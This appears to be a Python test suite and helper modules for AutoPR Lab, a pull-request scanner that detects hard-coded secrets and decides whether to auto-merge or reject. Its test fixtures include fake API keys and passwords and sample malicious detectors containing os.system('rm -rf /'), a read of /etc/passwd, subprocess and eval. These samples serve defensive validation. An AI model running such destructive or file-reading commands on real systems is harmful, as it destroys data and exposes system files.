        """A hard-coded ``ghp_`` token must yield at least one ERROR result."""
        content = 'TOKEN = "ghp_1234567890abcdefghijklmnopqrstuvwxyz12"'
        results = self.detector.analyze("config.py", content)
        self.assertTrue(any(r.status == DetectorStatus.ERROR for r in results))

    def test_detects_openai_key(self):
        """A hard-coded ``sk-`` key must yield at least one ERROR result."""
        content = 'OPENAI_KEY = "sk-abcdefghijklmnopqrstuvwxyz1234567890abcdefghijk"'
        results = self.detector.analyze("app.py", content)
        self.assertTrue(any(r.status == DetectorStatus.ERROR for r in results))

    def test_detects_rsa_private_key(self):
        """An RSA private-key PEM header must yield at least one ERROR result."""
        content = "-----BEGIN RSA PRIVATE KEY-----\nMIIEowIBAAKCAQEA..."
        results = self.detector.analyze("key.txt", content)
        self.assertTrue(any(r.status == DetectorStatus.ERROR for r in results))

    def test_detects_database_url_with_credentials(self):
        """A database URL embedding ``user:password@`` must yield an ERROR result."""
        content = 'DATABASE_URL = "postgresql://user:mypassword123@localhost/mydb"'
        results = self.detector.analyze("settings.py", content)
        self.assertTrue(any(r.status == DetectorStatus.ERROR for r in results))

    def test_ignores_env_var_reading(self):
        """Code that READS environment variables is safe and must not error."""
        content = 'api_key = os.getenv("MY_API_KEY")'
        results = self.detector.analyze("app.py", content)
        errors = [r for r in results if r.status == DetectorStatus.ERROR]
        self.assertEqual(len(errors), 0)

    def test_ignores_placeholder(self):
        """Placeholders in templates are not errors."""
        content = "API_KEY=your_api_key_here"
        results = self.detector.analyze("README.md", content)
        errors = [r for r in results if r.status == DetectorStatus.ERROR]
        self.assertEqual(len(errors), 0)

    def test_skips_binary_files(self):
        """A ``.png`` path must produce no results at all."""
        content = "binary content"
        results = self.detector.analyze("image.png", content)
        self.assertEqual(len(results), 0)


class TestPasswordsDetector(unittest.TestCase):
    """Unit tests for ``PasswordsDetector.analyze``."""

    def setUp(self):
        # A new detector instance is created for every test.
        self.detector = PasswordsDetector()

    def test_detects_hardcoded_password(self):
        """A string literal assigned to ``password`` must yield an ERROR result."""
        content = 'password = "mysecretpassword123"'
        results = self.detector.analyze("config.py", content)
        self.assertTrue(any(r.status == DetectorStatus.ERROR for r in results))

    def test_detects_trivial_password(self):
        """A trivial password must error and be called out in the result details."""
        content = 'PASSWORD = "admin"'
        results = self.detector.analyze("settings.py", content)
        errors = [r for r in results if r.status == DetectorStatus.ERROR]
        self.assertTrue(len(errors) > 0)
        # Check that the details mention the password is trivial/critical
        # (the detector's wording is Spanish, hence "crítico").
        has_trivial_warning = any(
            "trivial" in str(r.details).lower() or "crítico" in str(r.details).lower()
            for r in errors
        )
        self.assertTrue(has_trivial_warning)

    def test_detects_json_credential(self):
        """A ``"password"`` key with a literal value in JSON must yield an ERROR."""
        content = '{"password": "secretvalue123"}'
        results = self.detector.analyze("config.json", content)
        self.assertTrue(any(r.status == DetectorStatus.ERROR for r in results))

    def test_ignores_env_var_access(self):
        """Reading the password from the environment must not error."""
        content = 'db_pass = os.getenv("DB_PASSWORD")'
        results = self.detector.analyze("db.py", content)
        errors = [r for r in results if r.status == DetectorStatus.ERROR]
        self.assertEqual(len(errors), 0)

    def test_ignores_commented_line(self):
        """A password assignment inside a ``#`` comment must not error."""
        content = '# password = "example_do_not_use"'
        results = self.detector.analyze("example.py", content)
        errors = [r for r in results if r.status == DetectorStatus.ERROR]
        self.assertEqual(len(errors), 0)


class TestSensitiveFilesDetector(unittest.TestCase):
    """Unit tests for ``SensitiveFilesDetector.analyze``."""

    def setUp(self):
        # A new detector instance is created for every test.
        self.detector = SensitiveFilesDetector()

    def test_detects_env_file(self):
        """A ``.env`` file must yield at least one ERROR result."""
        content = "API_KEY=real_value_123\nDB_PASS=secret"
        results = self.detector.analyze(".env", content)
        self.assertTrue(any(r.status == DetectorStatus.ERROR for r in results))

    def test_detects_env_production(self):
        """A ``.env.production`` file must yield at least one ERROR result."""
        content = "PROD_SECRET=actualvalue123"
        results = self.detector.analyze(".env.production", content)
        self.assertTrue(any(r.status == DetectorStatus.ERROR for r in results))

    def test_detects_private_key_content(self):
        """Private-key PEM content must error even under an unremarkable file name."""
        content = "-----BEGIN PRIVATE KEY-----\nMIIEvgIBADANBgkq...\n-----END PRIVATE KEY-----"
        results = self.detector.analyze("any_file.txt", content)
        self.assertTrue(any(r.status == DetectorStatus.ERROR for r in results))

    def test_detects_aws_credentials_file(self):
        """An ``.aws/credentials`` path must yield at least one ERROR result."""
        content = "AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE"
        results = self.detector.analyze(".aws/credentials", content)
        self.assertTrue(any(r.status == DetectorStatus.ERROR for r in results))

    def test_warns_on_template_file(self):
        """A ``.env.example`` holding only placeholders must warn, not error."""
        content = "API_KEY=YOUR_API_KEY_HERE\nDB_PASS=your_password_here"
        results = self.detector.analyze(".env.example", content)
        # Template without real values = WARNING, not ERROR
        statuses = [r.status for r in results]
        self.assertIn(DetectorStatus.WARNING, statuses)
        self.assertNotIn(DetectorStatus.ERROR, statuses)

    def test_error_on_template_with_real_values(self):
        """A template file that contains a private-key header must still error."""
        content = "-----BEGIN RSA PRIVATE KEY-----\nrealkey..."
        results = self.detector.analyze(".env.example", content)
        self.assertTrue(any(r.status == DetectorStatus.ERROR for r in results))

    def test_normal_python_file_is_ok(self):
        """An ordinary Python source file must produce no ERROR results."""
        content = "def hello():\n    return 'Hello, World!'"
        results = self.detector.analyze("hello.py", content)
        errors = [r for r in results if r.status == DetectorStatus.ERROR]
        self.assertEqual(len(errors), 0)


class TestDetectorFormatValidator(unittest.TestCase):
    """Unit tests for ``DetectorFormatValidator.analyze`` on detector sources."""

    def setUp(self):
        # The validator is imported here rather than at module level.
        from detectors.detector_validator import DetectorFormatValidator

        self.validator = DetectorFormatValidator()

    def test_valid_detector_structure(self):
        """A BaseDetector subclass with name/description/severity/analyze has no errors."""
        content = """
from detectors.base_detector import BaseDetector, DetectorResult, DetectorStatus
from typing import List

class MyDetector(BaseDetector):
    @property
    def name(self): return "MyDetector"

    @property
    def description(self): return "Test detector"

    @property
    def severity(self): return "medium"

    def analyze(self, file_path: str, content: str) -> List[DetectorResult]:
        return []
"""
        results = self.validator.analyze("detectors/my_detector.py", content)
        errors = [r for r in results if r.status == DetectorStatus.ERROR]
        self.assertEqual(len(errors), 0)

    def test_rejects_subprocess_import(self):
        """A detector that imports ``subprocess`` must produce an ERROR."""
        content = """
import subprocess
from detectors.base_detector import BaseDetector, DetectorResult, DetectorStatus
from typing import List

class MaliciousDetector(BaseDetector):
    @property
    def name(self): return "MaliciousDetector"
    @property
    def description(self): return "Bad detector"
    @property
    def severity(self): return "low"
    def analyze(self, fp, content): return []
"""
        results = self.validator.analyze("detectors/malicious.py", content)
        errors = [r for r in results if r.status == DetectorStatus.ERROR]
        self.assertTrue(len(errors) > 0)

    def test_rejects_eval_usage(self):
        """A detector that calls ``eval`` must produce an ERROR."""
        content = """
from detectors.base_detector import BaseDetector, DetectorResult, DetectorStatus
from typing import List

class EvalDetector(BaseDetector):
    @property
    def name(self): return "EvalDetector"
    @property
    def description(self): return "Uses eval"
    @property
    def severity(self): return "low"
    def analyze(self, fp, content):
        eval(content) # PELIGROSO
        return []
"""
        results = self.validator.analyze("detectors/eval_detector.py", content)
        errors = [r for r in results if r.status == DetectorStatus.ERROR]
        self.assertTrue(len(errors) > 0)

    def test_rejects_missing_base_class(self):
        """A class that does not derive from BaseDetector must produce an ERROR."""
        content = """
class NotADetector:
    def analyze(self, fp, content):
        return []
"""
        results = self.validator.analyze("detectors/not_a_detector.py", content)
        errors = [r for r in results if r.status == DetectorStatus.ERROR]
        self.assertTrue(len(errors) > 0)


if __name__ == "__main__":
    # Build one suite from the four test classes, in this fixed order, and
    # run it verbosely; the exit status mirrors the overall test outcome.
    import unittest

    loader = unittest.TestLoader()
    suite = unittest.TestSuite()

    for test_class in [
        TestAPIKeysDetector,
        TestPasswordsDetector,
        TestSensitiveFilesDetector,
        TestDetectorFormatValidator,
    ]:
        tests = loader.loadTestsFromTestCase(test_class)
        suite.addTests(tests)

    runner = unittest.TextTestRunner(verbosity=2)
    result = runner.run(suite)
    sys.exit(0 if result.wasSuccessful() else 1)
class TestSecurityRules(unittest.TestCase):
    """Tests for the path and size rules exposed by ``SecurityRules``."""

    def test_allowed_paths_accepted(self):
        """Files under detectors/, tests/ and docs/ validate with no violations."""
        files = [
            "detectors/my_new_detector.py",
            "tests/test_my_detector.py",
            "docs/guide.md",
        ]
        is_valid, violations = SecurityRules.validate_paths(files)
        self.assertTrue(is_valid, f"Debería ser válido. Violations: {violations}")
        self.assertEqual(len(violations), 0)

    def test_forbidden_core_path_blocked(self):
        """A file under core/ is rejected with at least one violation."""
        files = ["core/scanner.py"]
        is_valid, violations = SecurityRules.validate_paths(files)
        self.assertFalse(is_valid)
        self.assertTrue(len(violations) > 0)

    def test_forbidden_workflow_path_blocked(self):
        """A GitHub Actions workflow file is rejected with at least one violation."""
        files = [".github/workflows/auto-pr.yml"]
        is_valid, violations = SecurityRules.validate_paths(files)
        self.assertFalse(is_valid)
        self.assertTrue(len(violations) > 0)

    def test_forbidden_requirements_blocked(self):
        """``requirements.txt`` is rejected."""
        files = ["requirements.txt"]
        is_valid, violations = SecurityRules.validate_paths(files)
        self.assertFalse(is_valid)

    def test_mixed_allowed_and_forbidden(self):
        """One forbidden file among allowed ones yields exactly one violation."""
        files = [
            "detectors/new_detector.py",  # OK
            "core/scanner.py",  # FORBIDDEN
        ]
        is_valid, violations = SecurityRules.validate_paths(files)
        self.assertFalse(is_valid)
        self.assertEqual(len(violations), 1)

    def test_size_limit_files(self):
        """One file more than ``MAX_FILES`` fails size validation."""
        is_valid, violations = SecurityRules.validate_size(
            num_files=SecurityRules.MAX_FILES + 1, lines_changed=10
        )
        self.assertFalse(is_valid)
        self.assertTrue(len(violations) > 0)

    def test_size_limit_lines(self):
        """One line more than ``MAX_LINES_CHANGED`` fails size validation."""
        is_valid, violations = SecurityRules.validate_size(
            num_files=1, lines_changed=SecurityRules.MAX_LINES_CHANGED + 1
        )
        self.assertFalse(is_valid)

    def test_size_within_limits(self):
        """3 files and 100 changed lines pass size validation with no violations."""
        is_valid, violations = SecurityRules.validate_size(
            num_files=3, lines_changed=100
        )
        self.assertTrue(is_valid)
        self.assertEqual(len(violations), 0)


class TestScannerIntegration(unittest.TestCase):
    """Integration tests that drive ``Scanner.scan_pr`` end to end."""

    def setUp(self):
        # A new scanner instance is created for every test.
        self.scanner = Scanner()

    def test_clean_detector_gets_merge(self):
        """A clean, valid detector must result in MERGE."""
        changed_files = {
            "detectors/my_clean_detector.py": """
from detectors.base_detector import BaseDetector, DetectorResult, DetectorStatus
from typing import List

class MyCleanDetector(BaseDetector):
    @property
    def name(self): return "MyCleanDetector"
    @property
    def description(self): return "A clean detector"
    @property
    def severity(self): return "low"
    def analyze(self, file_path: str, content: str) -> List[DetectorResult]:
        return []
""",
            "tests/test_my_clean_detector.py": """
import unittest
class TestMyCleanDetector(unittest.TestCase):
    def test_basic(self):
        self.assertTrue(True)
""",
        }

        result = self.scanner.scan_pr(
            pr_number=1,
            changed_files=changed_files,
            lines_changed=30,
        )

        self.assertEqual(result.global_status, "OK")
        self.assertEqual(result.decision, "MERGE")
        self.assertEqual(result.errors, 0)

    def test_api_key_in_detector_gets_rejected(self):
        """A detector with a hard-coded API key must be rejected."""
        changed_files = {
            "detectors/bad_detector.py": """
from detectors.base_detector import BaseDetector, DetectorResult, DetectorStatus
from typing import List

OPENAI_KEY = "sk-abcdefghijklmnopqrstuvwxyz1234567890abcdefghijk"

class BadDetector(BaseDetector):
    @property
    def name(self): return "BadDetector"
    @property
    def description(self): return "Has a hardcoded key"
    @property
    def severity(self): return "low"
    def analyze(self, fp, content): return []
""",
        }

        result = self.scanner.scan_pr(
            pr_number=2,
            changed_files=changed_files,
            lines_changed=15,
        )

        self.assertEqual(result.global_status, "ERROR")
        self.assertEqual(result.decision, "REJECT")
        self.assertGreater(result.errors, 0)

    def test_core_modification_gets_rejected(self):
        """Modifying /core/ must be rejected regardless of the file content."""
        changed_files = {
            "core/scanner.py": "# Perfectly clean code\nprint('hello')",
        }

        result = self.scanner.scan_pr(
            pr_number=3,
            changed_files=changed_files,
            lines_changed=2,
        )

        self.assertEqual(result.decision, "REJECT")
        # The default of True makes this fail if "paths_ok" is absent.
        self.assertFalse(result.path_validation.get("paths_ok", True))

    def test_workflow_modification_gets_rejected(self):
        """Modifying GitHub Actions workflows must be rejected."""
        changed_files = {
            ".github/workflows/auto-pr.yml": "name: Malicious workflow",
        }

        result = self.scanner.scan_pr(
            pr_number=4,
            changed_files=changed_files,
            lines_changed=1,
        )

        self.assertEqual(result.decision, "REJECT")

    def test_env_file_gets_rejected(self):
        """Including .env in the PR must result in REJECT."""
        changed_files = {
            ".env": "API_KEY=real_secret_value\nDB_PASSWORD=actual_password",
        }

        result = self.scanner.scan_pr(
            pr_number=5,
            changed_files=changed_files,
            lines_changed=2,
        )

        self.assertEqual(result.decision, "REJECT")

    def test_result_has_required_fields(self):
        """The scan result must expose every required field."""
        result = self.scanner.scan_pr(
            pr_number=99,
            changed_files={"docs/readme.md": "# Documentation"},
            lines_changed=1,
        )

        self.assertIsNotNone(result.global_status)
        self.assertIsNotNone(result.decision)
        self.assertIsNotNone(result.detectors_run)
        self.assertIsInstance(result.detectors_run, list)
        self.assertGreater(len(result.detectors_run), 0)
        self.assertIsNotNone(result.timestamp)


if __name__ == "__main__":
    # Allow running this file directly, with per-test output.
    unittest.main(verbosity=2)
class TestSecurityRegression(unittest.TestCase):
    """Regression tests: ``DetectorFormatValidator`` must flag known attack vectors.

    Every test feeds the validator the source of a detector that contains
    one dangerous construct and asserts that some ERROR finding's message
    names that construct.
    """

    def setUp(self):
        # A new validator instance is created for every test.
        self.validator = DetectorFormatValidator()

    def test_rejects_os_system_call(self):
        """An ``os.system(...)`` call must produce an ERROR mentioning ``system()``."""
        content = """
import os
from detectors.base_detector import BaseDetector

class AttackDetector(BaseDetector):
    @property
    def name(self): return "Attack"
    @property
    def description(self): return "x"
    @property
    def severity(self): return "low"
    def analyze(self, fp, content):
        os.system("rm -rf /") # DEBE SER RECHAZADO
        return []
"""
        results = self.validator.analyze("detectors/attack.py", content)
        errors = [r for r in results if r.status == DetectorStatus.ERROR]
        self.assertTrue(
            any("system()" in r.message for r in errors),
            "Debería haber bloqueado os.system()",
        )

    def test_rejects_subprocess_run(self):
        """A ``subprocess.run(...)`` call must produce an ERROR mentioning ``run()``."""
        content = """
import subprocess
from detectors.base_detector import BaseDetector

class AttackDetector(BaseDetector):
    @property
    def name(self): return "Attack"
    @property
    def description(self): return "x"
    @property
    def severity(self): return "low"
    def analyze(self, fp, content):
        subprocess.run(["ls"]) # DEBE SER RECHAZADO
        return []
"""
        results = self.validator.analyze("detectors/attack2.py", content)
        errors = [r for r in results if r.status == DetectorStatus.ERROR]
        self.assertTrue(
            any("run()" in r.message for r in errors),
            "Debería haber bloqueado subprocess.run()",
        )

    def test_rejects_shutil_import(self):
        """Importing ``shutil`` must produce an ERROR mentioning ``shutil``."""
        content = """
import shutil
from detectors.base_detector import BaseDetector

class AttackDetector(BaseDetector):
    @property
    def name(self): return "Attack"
    @property
    def description(self): return "x"
    @property
    def severity(self): return "low"
    def analyze(self, fp, content):
        return []
"""
        results = self.validator.analyze("detectors/attack3.py", content)
        errors = [r for r in results if r.status == DetectorStatus.ERROR]
        self.assertTrue(
            any("shutil" in r.message for r in errors),
            "Debería haber bloqueado import shutil",
        )

    def test_rejects_pickle_import(self):
        """Importing ``pickle`` must produce an ERROR mentioning ``pickle``."""
        content = """
import pickle
from detectors.base_detector import BaseDetector

class AttackDetector(BaseDetector):
    @property
    def name(self): return "Attack"
    @property
    def description(self): return "x"
    @property
    def severity(self): return "low"
    def analyze(self, fp, content):
        return []
"""
        results = self.validator.analyze("detectors/attack4.py", content)
        errors = [r for r in results if r.status == DetectorStatus.ERROR]
        self.assertTrue(
            any("pickle" in r.message for r in errors),
            "Debería haber bloqueado import pickle",
        )

    def test_rejects_builtin_open(self):
        """A call to the builtin ``open`` must produce an ERROR mentioning ``open()``."""
        content = """
from detectors.base_detector import BaseDetector

class AttackDetector(BaseDetector):
    @property
    def name(self): return "Attack"
    @property
    def description(self): return "x"
    @property
    def severity(self): return "low"
    def analyze(self, fp, content):
        with open("/etc/passwd") as f: # DEBE SER RECHAZADO
            pass
        return []
"""
        results = self.validator.analyze("detectors/attack5.py", content)
        errors = [r for r in results if r.status == DetectorStatus.ERROR]
        self.assertTrue(
            any("open()" in r.message for r in errors), "Debería haber bloqueado open()"
        )


if __name__ == "__main__":
    # Allow running this file directly.
    unittest.main()
def _format_finding(finding: dict) -> list[str]:
    """Render one finding as a Markdown bullet plus one sub-bullet per detail.

    The location suffix is assembled only from the parts that are present,
    so a finding without ``file_path`` or ``line_number`` never produces a
    dangling separator. A missing or ``None`` ``details`` entry is treated
    as "no details".
    """
    headline = f"- **{finding['detector_name']}**: {finding['message']}"

    location = f"en `{finding['file_path']}`" if finding.get("file_path") else ""
    if finding.get("line_number"):
        line_ref = f"línea {finding['line_number']}"
        location = f"{location}, {line_ref}" if location else line_ref
    if location:
        headline = f"{headline} {location}"

    rendered = [headline]
    # Two-space indent so Markdown nests each detail under its finding.
    rendered.extend(f"  - {detail}" for detail in finding.get("details") or [])
    return rendered


def _findings_section(findings: list[dict]) -> str:
    """Build the Markdown section listing findings grouped by status.

    Args:
        findings: Finding dicts. The keys read are ``status``,
            ``detector_name``, ``message`` and, optionally, ``file_path``,
            ``line_number`` and ``details``.

    Returns:
        A fixed "no problems" line when *findings* is empty; otherwise the
        ERROR group followed by the WARNING group, each under its own
        heading. Findings with any other status are not listed.
    """
    if not findings:
        return "_No se encontraron problemas._\n"

    groups = (
        ("ERROR", "**❌ Errores críticos:**"),
        ("WARNING", "**⚠️ Advertencias:**"),
    )

    lines: list[str] = []
    for status, heading in groups:
        matching = [f for f in findings if f.get("status") == status]
        if not matching:
            continue
        lines.append(heading)
        for finding in matching:
            lines.extend(_format_finding(finding))
        lines.append("")  # blank line closes the group

    return "\n".join(lines)


def _path_violations_section(path_validation: dict) -> str:
    """Build the Markdown section listing path-rule violations.

    Returns an empty string when ``path_validation`` has no ``violations``
    entry or the entry is empty.
    """
    violations = path_validation.get("violations", [])
    if not violations:
        return ""

    lines = ["**🛡️ Violaciones de reglas de seguridad:**"]
    lines.extend(f"- {violation}" for violation in violations)
    lines.append("")
    return "\n".join(lines)


def build_merge_comment(result: Any) -> str:
    """Build the PR comment posted when the PR is merged with no findings.

    Reads ``files_analyzed``, ``detectors_run``, ``scan_duration_ms`` and
    ``timestamp`` from *result*; error and warning counts are rendered as
    the literal ``0``.
    """
    detectors_text = "\n".join(f"- ✅ `{d}`" for d in result.detectors_run)

    return f"""## 🤖 AutoPR Lab — Análisis Completado

### ✅ DECISIÓN: MERGE AUTOMÁTICO APROBADO

El PR cumple todos los requisitos de seguridad y calidad.

---

### 📊 Resumen del Análisis

| Métrica | Valor |
|---------|-------|
| Archivos analizados | `{result.files_analyzed}` |
| Detectores ejecutados | `{len(result.detectors_run)}` |
| Errores | `0` |
| Advertencias | `0` |
| Tiempo de análisis | `{result.scan_duration_ms:.0f}ms` |

### 🔍 Detectores ejecutados
{detectors_text}

---

> 🔀 **Este PR ha sido mergeado automáticamente** por AutoPR Lab.
> _Análisis completado: {result.timestamp}_
"""


def build_warn_merge_comment(result: Any) -> str:
    """Build the PR comment posted when the PR is merged despite warnings.

    Reads ``findings``, ``files_analyzed``, ``warnings``,
    ``scan_duration_ms`` and ``timestamp`` from *result*.
    """
    findings_text = _findings_section(result.findings)

    return f"""## 🤖 AutoPR Lab — Análisis Completado

### ⚠️ DECISIÓN: MERGE CON ADVERTENCIAS

El PR fue mergeado automáticamente pero se detectaron advertencias no críticas.

---

### 📊 Resumen del Análisis

| Métrica | Valor |
|---------|-------|
| Archivos analizados | `{result.files_analyzed}` |
| Errores | `0` ✅ |
| Advertencias | `{result.warnings}` ⚠️ |
| Tiempo de análisis | `{result.scan_duration_ms:.0f}ms` |

### ⚠️ Hallazgos (no críticos)

{findings_text}

### ℹ️ Nota
Las advertencias no bloquean el merge pero se recomienda revisarlas en el futuro.

---

> 🔀 **Este PR ha sido mergeado automáticamente** a pesar de las advertencias.
> _Análisis completado: {result.timestamp}_
"""
+> _Para apelar esta decisión, contacta a los maintainers del proyecto._ +> _Análisis completado: {result.timestamp}_ +""" diff --git a/utils/github_api.py b/utils/github_api.py new file mode 100644 index 0000000..f39eb77 --- /dev/null +++ b/utils/github_api.py @@ -0,0 +1,221 @@ +""" +AutoPR Lab - GitHub API Client +================================ +Wrapper para operaciones de la GitHub API: +aprobar, rechazar, mergear y comentar en PRs. +""" + +import json +import urllib.error +import urllib.request +from typing import Any, cast + +from utils.logger import get_logger + +logger = get_logger("github_api") + + +class GitHubAPIError(Exception): + """Error de la API de GitHub.""" + + def __init__(self, message: str, status_code: int = 0, response: str = ""): + super().__init__(message) + self.status_code = status_code + self.response = response + + +class GitHubAPI: + """ + Cliente para la GitHub REST API v3. + Usa solo módulos de la biblioteca estándar (sin requests). + """ + + BASE_URL = "https://api.github.com" + + def __init__(self, token: str, repo: str, pr_number: int): + """ + Args: + token: GitHub token (GITHUB_TOKEN del workflow) + repo: Repositorio en formato "owner/repo" + pr_number: Número del Pull Request + """ + self.token = token + self.repo = repo + self.pr_number = pr_number + + def _request( + self, + method: str, + endpoint: str, + body: dict[str, Any] | None = None, + accept: str = "application/vnd.github+json", + ) -> Any: + """Realiza una petición a la GitHub API.""" + url = f"{self.BASE_URL}/{endpoint.lstrip('/')}" + headers = { + "Authorization": f"Bearer {self.token}", + "Accept": accept, + "X-GitHub-Api-Version": "2022-11-28", + "Content-Type": "application/json", + "User-Agent": "AutoPR-Lab/1.0", + } + + data = json.dumps(body).encode("utf-8") if body else None + req = urllib.request.Request(url, data=data, headers=headers, method=method) + + try: + with urllib.request.urlopen(req) as response: + response_body = 
response.read().decode("utf-8") + return json.loads(response_body) if response_body.strip() else {} + except urllib.error.HTTPError as e: + error_body = e.read().decode("utf-8") + raise GitHubAPIError( + f"GitHub API {method} {url} → {e.code}: {error_body}", + status_code=e.code, + response=error_body, + ) from e + + # ── Información del PR ────────────────────────────────────────────── + + def get_pr_info(self) -> dict[str, Any]: + """Obtiene información del PR.""" + return cast(dict[str, Any], self._request("GET", f"repos/{self.repo}/pulls/{self.pr_number}")) + + def get_changed_files(self) -> list[dict[str, Any]]: + """Obtiene lista de archivos modificados en el PR.""" + files = [] + page = 1 + while True: + result = self._request( + "GET", + f"repos/{self.repo}/pulls/{self.pr_number}/files?per_page=100&page={page}", + ) + if not result: + break + files.extend(result) + if len(result) < 100: + break + page += 1 + return files + + def get_file_content(self, raw_url: str) -> str: + """Descarga el contenido de un archivo del PR usando su raw_url.""" + req = urllib.request.Request( + raw_url, + headers={ + "Authorization": f"Bearer {self.token}", + "User-Agent": "AutoPR-Lab/1.0", + }, + ) + try: + with urllib.request.urlopen(req) as response: + return cast(str, response.read().decode("utf-8", errors="replace")) + except Exception as e: + logger.warning(f"No se pudo descargar {raw_url}: {e}") + return "" + + def get_file_content_by_path(self, path: str, ref: str) -> str: + """ + Descarga el contenido de un archivo usando la API de contenidos. + Útil si no se dispone de raw_url o para una revisión específica. 
+ """ + import base64 + + try: + result = self._request( + "GET", f"repos/{self.repo}/contents/{path}?ref={ref}" + ) + content_b64 = result.get("content", "") + if content_b64: + return base64.b64decode(content_b64).decode("utf-8", errors="replace") + except Exception as e: + logger.warning(f"No se pudo descargar {path} en {ref}: {e}") + return "" + + # ── Acciones sobre el PR ──────────────────────────────────────────── + + def add_comment(self, body: str) -> dict[str, Any]: + """Agrega un comentario al PR.""" + logger.info(f"💬 Agregando comentario al PR #{self.pr_number}") + return cast(dict[str, Any], self._request( + "POST", + f"repos/{self.repo}/issues/{self.pr_number}/comments", + body={"body": body}, + )) + + def approve_pr( + self, message: str = "AutoPR Lab: ✅ Aprobado automáticamente" + ) -> dict[str, Any]: + """Aprueba el PR con un review.""" + logger.info(f"✅ Aprobando PR #{self.pr_number}") + return cast(dict[str, Any], self._request( + "POST", + f"repos/{self.repo}/pulls/{self.pr_number}/reviews", + body={"body": message, "event": "APPROVE"}, + )) + + def request_changes(self, message: str) -> dict[str, Any]: + """Solicita cambios en el PR (REQUEST_CHANGES review).""" + logger.info(f"❌ Solicitando cambios en PR #{self.pr_number}") + return cast(dict[str, Any], self._request( + "POST", + f"repos/{self.repo}/pulls/{self.pr_number}/reviews", + body={"body": message, "event": "REQUEST_CHANGES"}, + )) + + def merge_pr( + self, + commit_title: str | None = None, + commit_message: str | None = None, + merge_method: str = "squash", + ) -> dict[str, Any]: + """ + Hace merge del PR. 
+ + Args: + merge_method: "merge" | "squash" | "rebase" + """ + logger.info(f"🔀 Mergeando PR #{self.pr_number} con método '{merge_method}'") + + pr_info = self.get_pr_info() + sha = pr_info.get("head", {}).get("sha", "") + + body = { + "merge_method": merge_method, + "sha": sha, + } + if commit_title: + body["commit_title"] = commit_title + if commit_message: + body["commit_message"] = commit_message + + try: + return cast(dict[str, Any], self._request( + "PUT", + f"repos/{self.repo}/pulls/{self.pr_number}/merge", + body=body, + )) + except GitHubAPIError as e: + if e.status_code == 405: + raise GitHubAPIError( + "El PR no puede ser mergeado (puede estar desactualizado o tener conflictos)", + status_code=e.status_code, + ) from e + raise + + def close_pr(self) -> dict[str, Any]: + """Cierra el PR sin hacer merge.""" + logger.info(f"🚫 Cerrando PR #{self.pr_number}") + return cast(dict[str, Any], self._request( + "PATCH", + f"repos/{self.repo}/pulls/{self.pr_number}", + body={"state": "closed"}, + )) + + def add_label(self, label: str) -> dict[str, Any]: + """Agrega un label al PR.""" + return cast(dict[str, Any], self._request( + "POST", + f"repos/{self.repo}/issues/{self.pr_number}/labels", + body={"labels": [label]}, + )) diff --git a/utils/logger.py b/utils/logger.py new file mode 100644 index 0000000..af016fd --- /dev/null +++ b/utils/logger.py @@ -0,0 +1,64 @@ +""" +AutoPR Lab - Logger +===================== +Sistema de logging centralizado con formato consistente y colores. 
+""" + +import logging +import os +import sys + +# Colores ANSI para terminal +RESET = "\033[0m" +BOLD = "\033[1m" +RED = "\033[91m" +YELLOW = "\033[93m" +GREEN = "\033[92m" +BLUE = "\033[94m" +CYAN = "\033[96m" +GRAY = "\033[90m" + + +class ColoredFormatter(logging.Formatter): + """Formatter con colores para output de terminal.""" + + LEVEL_COLORS = { + logging.DEBUG: GRAY, + logging.INFO: CYAN, + logging.WARNING: YELLOW, + logging.ERROR: RED, + logging.CRITICAL: f"{BOLD}{RED}", + } + + def format(self, record: logging.LogRecord) -> str: + color = self.LEVEL_COLORS.get(record.levelno, RESET) + level_str = f"{color}{record.levelname:8}{RESET}" + name_str = f"{BLUE}{record.name}{RESET}" + return f"{level_str} {name_str} | {record.getMessage()}" + + +def get_logger(name: str, level: int | None = None) -> logging.Logger: + """ + Obtiene un logger configurado para AutoPR Lab. + + Args: + name: Nombre del módulo (ej: "scanner", "github_api") + level: Nivel de logging (default: INFO, o DEBUG si LOG_LEVEL=DEBUG) + """ + logger = logging.getLogger(f"autopr.{name}") + + if logger.handlers: + return logger + + if level is None: + env_level = os.environ.get("LOG_LEVEL", "INFO").upper() + level = getattr(logging, env_level, logging.INFO) + + logger.setLevel(level) + + handler = logging.StreamHandler(sys.stdout) + handler.setFormatter(ColoredFormatter()) + logger.addHandler(handler) + logger.propagate = False + + return logger